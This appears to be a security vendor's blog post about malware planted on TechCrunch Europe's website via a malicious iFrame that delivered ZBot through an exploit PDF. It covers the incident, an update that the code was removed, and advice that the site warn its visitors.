Updated The European website of TechCrunch (eu.techcrunch.com), one of the world’s most popular blogs, appears to have fallen victim to hackers, who have planted a malicious script on their site, designed to infect unsuspecting visitors.
TechCrunch Europe posted a message on its Twitter feed earlier today describing warnings about malware being distributed via the site as “annoying”. Perhaps a rather unusual turn of phrase, which might suggest to observers that the warnings were erroneous rather than the result of a serious security problem.
A closer examination of TechCrunch Europe’s site reveals that the offending code – which uses a malicious iFrame – is found in a JavaScript file, used by the site as part of its WordPress infrastructure. This attempts to serve up a malicious PDF file, exploiting a vulnerability that brings to your computer a nasty infection from the ZBot (also known as Zeus) malware family.
Sophos customers who have already switched on the “Live Protection” in version Sophos Endpoint Security and Data Protection 9.5, are already protected – benefiting from our very latest in-the-cloud technology to defend against the latest threats like this, efficiently and proactively. There’s a lesson here: “If you are using Sophos version 9.5, turn on live protection!” It’s worth it!
Users of some web browsers may also be protected – for instance, here’s a screenshot of Firefox intercepting one of the infected pages on TechCrunch Europe.
The problem appears to have been present on TechCrunch Europe’s website for some time, and yet there’s been no obvious warning to visitors posted on its site nor – seemingly – no attempt to remove the malicious script or block users from visiting the infected pages.
One has to wonder whether malicious hackers are taking advantage of the Labor Day holiday in North America today which may mean that less of TechCrunch’s support team (who might be able to fix this problem) are available today.
SophosLabs have analysed the malware being spread via the infection, which we detect as Troj/Zbot-YP.
Update Andy Brett, an engineer who works for TechCrunch in California contacted me at about 10pm UK time, to tell me that the malicious JavaScript code has been removed from the site, although it may take some time before browsers which rely on third-party blacklists stop warning about pages on the site.
Ideally TechCrunch will post a message on its site (on the TechCrunch Europe site, at least) informing users about the incident and advising that they check their PCs with an up-to-date anti-virus. I don’t see any message to that effect yet on that site – but I’m hopeful.
Yes, some firms are embarrassed when their websites become infected – and it’s not the kind of event that we would wish upon anyone. But let’s not forget that TechCrunch is the victim of a criminal act, and although in an ideal world their site would not have been compromised in this way they are not – ultimately – the ones to blame for the wrongdoing.
What they can do, as a responsible member of the internet community, is advise anyone who might have visited the site while it was infected to double-check their computer systems. That’s the kind of behaviour that we would expect of any website that suffered a security problem – and is, indeeed, the kind of behaviour that technology media websites like TechCrunch would expect from others too.
Hat-tip: Thanks to @theharmonyguy who first made me aware of this issue.